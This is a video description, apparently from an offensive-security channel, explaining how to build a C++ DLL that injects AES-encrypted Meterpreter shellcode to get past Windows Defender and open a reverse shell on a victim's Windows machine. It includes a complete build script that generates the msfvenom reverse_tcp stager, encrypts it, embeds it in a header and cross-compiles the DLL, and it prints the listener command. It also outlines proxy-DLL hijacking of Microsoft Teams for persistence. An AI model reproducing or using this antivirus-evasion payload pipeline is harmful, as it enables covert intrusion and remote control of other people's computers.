Bypass Windows Defender with C++ .DLL Payload File - Meterpreter Reverse Shell

Publisher: Be better than yesterday

This video shows how several publicly available tools were modified and a template C++ file customised to produce a DLL that performs shellcode process injection and, at the time of recording, bypassed Windows Defender to obtain a working Meterpreter reverse shell on a victim's Windows machine. Such bypasses are point-in-time: Defender's signatures and behavioural detections are updated continuously, so a template that evades detection when a video is recorded may well be flagged later.

The .DLL payload was cross-compiled on a Kali machine. It carries AES-encrypted shellcode, decrypts it at runtime and injects it into a process, following the approach of the publicly available GitHub repository referenced below.

The video provides a step-by-step walkthrough and a practical demonstration of generating a C++ .DLL payload that achieves a Meterpreter reverse shell on a Windows machine with Windows Defender running.
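As an added example (not code from the video, nor from the Shellcode-Hide repository), the following Kali-side build pipeline covers the steps the walkthrough describes: generate raw Meterpreter shellcode, AES-encrypt it, embed ciphertext plus key and IV in a header, and cross-compile the DLL with mingw-w64. The listener address, file names, key and IV are placeholders; the C++ loader `payload.cpp` is assumed to exist and to decrypt `enc_shellcode` with the same AES-256-CBC key and IV before injecting it, and is not shown here.

```shell
#!/bin/sh
# Added example (not code from the video or from the Shellcode-Hide repo):
# a build pipeline on Kali for a DLL that carries AES-encrypted Meterpreter
# shellcode. File names, listener address, key and IV are placeholders.
# The C++ loader (payload.cpp) is assumed to exist and to decrypt the
# embedded buffer with the same AES-256-CBC key and IV before injecting it;
# it is not part of this example.
set -eu

# Convert a binary file to a comma-separated C byte initialiser.
bin2c() {
    od -An -v -tx1 "$1" | tr -s ' \n' '\n' | sed '/^$/d; s/^/0x/' | paste -s -d ',' -
}

# Convert a hex string (e.g. "00ff10") to the same C initialiser form.
hex2c() {
    printf '%s' "$1" | sed 's/../0x&,/g; s/,$//'
}

# Write a header with the encrypted buffer, its length, key and IV as C arrays.
# Args: encrypted blob, key hex, iv hex, output header path.
emit_header() {
    enc_file=$1; key_hex=$2; iv_hex=$3; out=$4
    {
        printf 'unsigned char enc_shellcode[] = { %s };\n' "$(bin2c "$enc_file")"
        printf 'unsigned int enc_shellcode_len = %s;\n' "$(wc -c < "$enc_file" | tr -d ' ')"
        printf 'unsigned char aes_key[] = { %s };\n' "$(hex2c "$key_hex")"
        printf 'unsigned char aes_iv[] = { %s };\n' "$(hex2c "$iv_hex")"
    } > "$out"
}

# Full pipeline; only runs when invoked as: sh build.sh build
build() {
    lhost=${LHOST:-10.10.14.5}        # placeholder listener address
    lport=${LPORT:-4444}
    key_hex=$(openssl rand -hex 32)   # 32 bytes -> AES-256
    iv_hex=$(openssl rand -hex 16)    # 16-byte CBC IV

    # 1. Raw x64 Meterpreter stager from msfvenom.
    msfvenom -p windows/x64/meterpreter/reverse_tcp \
        LHOST="$lhost" LPORT="$lport" -f raw -o shellcode.bin

    # 2. AES-256-CBC with an explicit key/IV and no OpenSSL salt header,
    #    so the loader only has to implement plain CBC decryption.
    openssl enc -aes-256-cbc -K "$key_hex" -iv "$iv_hex" -nosalt \
        -in shellcode.bin -out shellcode.enc

    # 3. Embed ciphertext, key and IV in the header the loader includes.
    emit_header shellcode.enc "$key_hex" "$iv_hex" shellcode.h

    # 4. Cross-compile the DLL (static, so no mingw runtime DLLs are
    #    needed on the target; -s strips symbols).
    x86_64-w64-mingw32-g++ -shared -static -O2 -s -o payload.dll payload.cpp

    # 5. Sanity-check the artefact is a 64-bit PE DLL before using it.
    file payload.dll
    echo "handler: msfconsole -q -x 'use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST $lhost; set LPORT $lport; run'"
}

if [ "${1:-}" = "build" ]; then
    build
fi
```

The key and IV end up inside the DLL, so the encryption hides the shellcode only from static scanning of the file on disk; once decrypted in memory it is exposed to behavioural and memory-scanning detections, which is why the loader side matters as much as the encryption.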

The video also gives a high-level explanation of why .DLL payloads are useful and points to an article on a practical use case involving Microsoft Teams: a proxy DLL is placed where the application loads a legitimate DLL, forwards the legitimate exports to the original DLL so the application keeps working, and runs its own code alongside, which can be leveraged for persistence and proxy execution.

GitHub repository reference:
https://github.com/TheD1rkMtr/Shellcode-Hide

Microsoft Teams article reference:
https://milosilo.com/hacking/microsoft-teams-proxy-dll-hijacking/#:~:text=DLL%20Hijacking%20using%20a%20proxy,commands%20to%20the%20intended%20dll.

Gemini Security Awesome Hacking T-Shirts - Support the channel:
https://www.redbubble.com/people/GeminiSecurity/shop?asc=u
Category: C++ programming language